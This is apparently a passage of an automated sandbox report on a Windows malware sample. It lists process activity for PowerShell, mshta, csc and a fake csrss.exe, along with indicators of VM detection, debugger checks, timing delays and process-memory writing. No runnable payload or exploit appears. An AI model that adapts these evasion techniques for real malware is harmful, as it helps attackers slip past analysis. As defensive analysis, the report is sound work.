                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Users\user\AppData\Roaming\csrss.exeMemory allocated: 3800000 memory commit 500064256Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeMemory allocated: 3801000 memory commit 500154368Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeMemory allocated: 3827000 memory commit 500002816Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeMemory allocated: 3828000 memory commit 500047872Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeMemory allocated: 3833000 memory commit 500015104Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeMemory allocated: 3837000 memory commit 500006912Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeMemory allocated: 3838000 memory commit 500015104Jump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFCC372D324
                        Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFCC372D7E4
                        Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFCC372D944
                        Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFCC372D504
                        Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFCC372D544
                        Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFCC372D1E4
                        Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFCC3730154
                        Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFCC372DA44
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CFD1C0 rdtsc 17_2_30CFD1C0
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 9987Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7115Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2473Jump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeWindow / User API: threadDelayed 2575Jump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeWindow / User API: threadDelayed 7398Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.dllJump to dropped file
                        Source: C:\Users\user\Links\iaoqralA.pifAPI coverage: 0.9 %
                        Source: C:\Windows\SysWOW64\systeminfo.exeAPI coverage: 3.1 %
                        Source: C:\Windows\SysWOW64\mshta.exe TID: 4804Thread sleep count: 9987 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4476Thread sleep count: 7115 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep count: 2473 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5896Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 7172Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 7780Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exe TID: 8180Thread sleep count: 2575 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exe TID: 8180Thread sleep time: -5150000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exe TID: 8180Thread sleep count: 7398 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exe TID: 8180Thread sleep time: -14796000s >= -30000sJump to behavior
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe TID: 6156Thread sleep time: -80000s >= -30000s
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe TID: 6156Thread sleep count: 40 > 30
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe TID: 6156Thread sleep time: -40000s >= -30000s
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exe TID: 6156Thread sleep time: -45000s >= -30000s
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                        Source: C:\Windows\SysWOW64\systeminfo.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\systeminfo.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_038054D0 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,12_2_038054D0
                        Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 21_2_0241C530 FindFirstFileW,FindNextFileW,FindClose,21_2_0241C530
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: 4nHrKBXqqqVJFZFp.exe, 00000016.00000002.3626954073.0000000000FA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
                        Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                        Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                        Source: csrss.exe, 0000000C.00000002.1289157524.0000000000844000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAS
                        Source: powershell.exe, 00000003.00000002.1339109862.00000000033A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\e
                        Source: powershell.exe, 00000003.00000002.1387322502.000000000885F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1339109862.000000000334C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2818162796.000001E5B802B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2818754364.000001E5BD657000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: powershell.exe, 00000003.00000002.1387455889.0000000008869000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53fB
                        Source: powershell.exe, 00000003.00000002.1387455889.0000000008869000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                        Source: powershell.exe, 00000003.00000002.1354721983.00000000051C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                        Source: systeminfo.exe, 00000015.00000002.3625591179.0000000002499000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.1852451358.0000022AEA94C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\csrss.exeAPI call chain: ExitProcess graph end nodegraph_12-22509
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_0381AF3C GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,12_2_0381AF3C
                        Source: C:\Users\user\AppData\Roaming\csrss.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Links\iaoqralA.pifProcess queried: DebugPortJump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CFD1C0 rdtsc 17_2_30CFD1C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_00417793 LdrLoadDll,17_2_00417793
                        Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 12_2_03813F9C LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,12_2_03813F9C
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C970C0 mov eax, dword ptr fs:[00000030h]17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C970C0 mov ecx, dword ptr fs:[00000030h]17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C970C0 mov ecx, dword ptr fs:[00000030h]17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C970C0 mov eax, dword ptr fs:[00000030h]17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C970C0 mov ecx, dword ptr fs:[00000030h]17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C970C0 mov ecx, dword ptr fs:[00000030h]17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C970C0 mov eax, dword ptr fs:[00000030h]17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C970C0 mov eax, dword ptr fs:[00000030h]17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C970C0 mov eax, dword ptr fs:[00000030h]17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C970C0 mov eax, dword ptr fs:[00000030h]17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C970C0 mov eax, dword ptr fs:[00000030h]17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C970C0 mov eax, dword ptr fs:[00000030h]17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C970C0 mov eax, dword ptr fs:[00000030h]17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C970C0 mov eax, dword ptr fs:[00000030h]17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C970C0 mov eax, dword ptr fs:[00000030h]17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C970C0 mov eax, dword ptr fs:[00000030h]17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C970C0 mov eax, dword ptr fs:[00000030h]17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C970C0 mov eax, dword ptr fs:[00000030h]17_2_30C970C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D550D9 mov eax, dword ptr fs:[00000030h]17_2_30D550D9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D020DE mov eax, dword ptr fs:[00000030h]17_2_30D020DE
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CFD0C0 mov eax, dword ptr fs:[00000030h]17_2_30CFD0C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CFD0C0 mov eax, dword ptr fs:[00000030h]17_2_30CFD0C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA90DB mov eax, dword ptr fs:[00000030h]17_2_30CA90DB
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C880E9 mov eax, dword ptr fs:[00000030h]17_2_30C880E9
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7A0E3 mov ecx, dword ptr fs:[00000030h]17_2_30C7A0E3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA50E4 mov eax, dword ptr fs:[00000030h]17_2_30CA50E4
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA50E4 mov ecx, dword ptr fs:[00000030h]17_2_30CA50E4
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7C0F0 mov eax, dword ptr fs:[00000030h]17_2_30C7C0F0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC20F0 mov ecx, dword ptr fs:[00000030h]17_2_30CC20F0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8208A mov eax, dword ptr fs:[00000030h]17_2_30C8208A
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7D08D mov eax, dword ptr fs:[00000030h]17_2_30C7D08D
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB909C mov eax, dword ptr fs:[00000030h]17_2_30CB909C
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAD090 mov eax, dword ptr fs:[00000030h]17_2_30CAD090
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAD090 mov eax, dword ptr fs:[00000030h]17_2_30CAD090
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C85096 mov eax, dword ptr fs:[00000030h]17_2_30C85096
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D460B8 mov eax, dword ptr fs:[00000030h]17_2_30D460B8
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D460B8 mov ecx, dword ptr fs:[00000030h]17_2_30D460B8
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2705E mov ebx, dword ptr fs:[00000030h]17_2_30D2705E
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2705E mov eax, dword ptr fs:[00000030h]17_2_30D2705E
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C82050 mov eax, dword ptr fs:[00000030h]17_2_30C82050
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAB052 mov eax, dword ptr fs:[00000030h]17_2_30CAB052
